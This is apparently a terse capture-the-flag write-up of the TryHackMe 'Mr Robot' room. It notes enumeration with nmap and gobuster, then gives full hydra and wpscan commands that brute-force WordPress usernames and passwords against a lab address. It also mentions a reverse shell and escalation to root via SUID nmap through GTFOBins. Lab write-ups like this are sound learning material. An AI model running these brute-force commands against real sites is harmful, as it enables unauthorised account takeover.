CTF Mr Robot

Benjamin

09-01-2023

CTF › TryHackMe

CMS, Wordpress

nmap

Closed but it’s ok, THM take lot of time to load

Gobuster

wordpress login
http://10.10.185.72/wp-login.php

robots.txt

So…

Wordpress

Find the user

hydra -L fsocity.dic -p admin 10.10.185.72 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.185.72%2Fwp-admin%2F&testcookie=1:F=Invalid username."

Find the password

1	wpscan -v -U user.txt -P fsocity.dic.sort --url http://10.10.185.72/wp-login.php

Revershell

zip it, send it, listen and activate.

Robot

md5

root

lse.sh

lse.sh is in my current directory.

/usr/local/bin/nmap

nmap exploit

https://gtfobins.github.io/gtfobins/nmap/